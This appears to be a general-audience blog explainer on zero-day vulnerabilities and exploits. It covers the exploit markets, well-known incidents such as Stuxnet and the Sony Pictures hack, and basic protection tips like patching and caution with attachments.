What is zero day?
Most software has had a bug at some point. But what if that bug has the potential to open backdoors for hackers to exploit? Worse still, what if the developers of the software have no idea it exists? Criminals can abuse these so-called zero day vulnerabilities for months or even years before anyone patches them. So what are these vulnerabilities? And how much damage can they cause?
What is zero day?
The phrase “zero day” can refer to two different concepts — zero day vulnerabilities and zero day exploits. So, let’s start with the first one.
A zero day vulnerability is a flaw in software or hardware which is yet to be discovered by its developers. This means that there’s currently no way to plug the hole in security. It can be any vulnerability — a bug, lack of encryption, missing authorizations, to name a few examples.
The term zero day alludes to the amount of time — zero days — that the software vendor has been aware of the problem. The name goes back to online bulletin boards, when zero day meant the number of days a new software has been released publicly.
In the best case scenarios, when someone discovers a zero day vulnerability, they report it to the software developers, so they can patch it before it can be exploited. There are actually databases where the cybersecurity community pools their knowledge to help combat these threats together. But unfortunately, sometimes the hackers get there first.
Zero day exploits and attacks
This brings us to a zero day exploit. A zero day exploit is the code criminals use to abuse the zero day vulnerability for their own means. Vulnerabilities allow them to carry out a zero day attack — installing backdoors, injecting malware, or stealing sensitive information.
Since zero day attacks can potentially be carried out undetected, these vulnerabilities are incredibly valuable. It’s not only hackers looking to profit from the weak cybersecurity of a large organization. Intelligence agencies around the world can also initiate zero day exploits.
The global exploit market
Discovering, buying, and selling zero day vulnerabilities is emerging as a whole industry.
- Black markets sell information on zero day vulnerabilities, enabling criminals to trade information about how they can abuse software bugs.
- Grey markets cater to cybersecurity businesses, and allow researchers to sell information to militaries, intelligence agencies, and other authorities.
- White markets are more like the CVE or bug bounty programs, where researchers disclose information to buggy software developers.
So, what happens when hackers find the vulnerabilities before the vendors do?
Famous zero day attacks
There are many infamous zero day attack examples throughout modern history. Let’s take a look at some of the most notorious incidents.
Stuxnet was a computer worm that used different Windows zero day vulnerabilities to target supervisory control and data acquisition (SCADA) systems.
The worm caused enormous damage to the nuclear program of Iran. It destroyed nearly a fifth of Iran’s nuclear centrifuges and infected a staggering 200,000 computers. It’s often described as one of the first cyber weapons since the perpetrators behind the worm are thought to be the United States and Israel.
The Sony hack in 2014 also tops the list as one of the most famous zero day exploits. During the Sony Pictures hack, criminals utilized a zero day vulnerability to break into the company’s network and steal data.
Hackers later released the incredibly sensitive information, including the copies of upcoming movies, the company’s plans for the future, business deals, and Sony’s top management emails. What specific exploit the hackers used remains a mystery to this day.
Back in 2017, hackers found a vulnerability in Microsoft Word and developed Dridex malware which they then hid in MS Word attachments. Those who downloaded the file would activate the Dridex Trojan. The dangerous bank fraud malware spread to millions of users worldwide.
Browsers are vulnerable too
It’s not just the apps you’re using that can get targeted. The browser you’re reading this blog post on could also be exploited.
Firefox zero day
In 2020 Firefox had a vulnerability that allowed hackers to place and execute code inside Firefox’s memory. This enabled criminals to run malicious code on any of their victims’ devices. The developers released an emergency patch, but not before some hackers managed to exploit it.
Google Chrome zero day
2021 hasn’t been great for Chrome zero day exploits. The browser had to issue three emergency patches for zero day vulnerabilities this year. The latest flaw could enable remote code execution and DDoS attacks on the systems affected.
Zero days and the workplace environment
Since any software you’re using can fall victim to a zero day threat, what does that mean for businesses? A faulty line of code can create a backdoor in your organization’s systems, so the first thing to do is reorient your thinking about cybersecurity.
Most organizations’ responses to cybersecurity incidents tend to be reactionary — responding to previously known threats. However, the problem with zero days is that, by the time you know what happened, it’s already too late.
The key to zero day protection is a proactive approach. Detection, data, and activity monitoring are some of the first steps in avoiding zero day attacks.
Zero day protection
So, how do you protect yourself from a threat you don’t know about? Sometimes, hackers use zero day vulnerabilities together with other attack methods. Here’s how to lower your risk of falling victim to an attack:
- Update your software ASAP. Software updates often contain patches for critical vulnerabilities.
- Stay informed. Vulnerability databases and bug bounty programs are vital in detecting flaws in your software.
- Be wary of phishing scams.Some zero day attacks only work when combined with other attacks. Don’t click on unknown links or email attachments — you may end up providing sensitive data to criminals.
- Use cybersecurity tools. Make sure you’re using a VPN and antivirus software to protect you from potential cyber threats.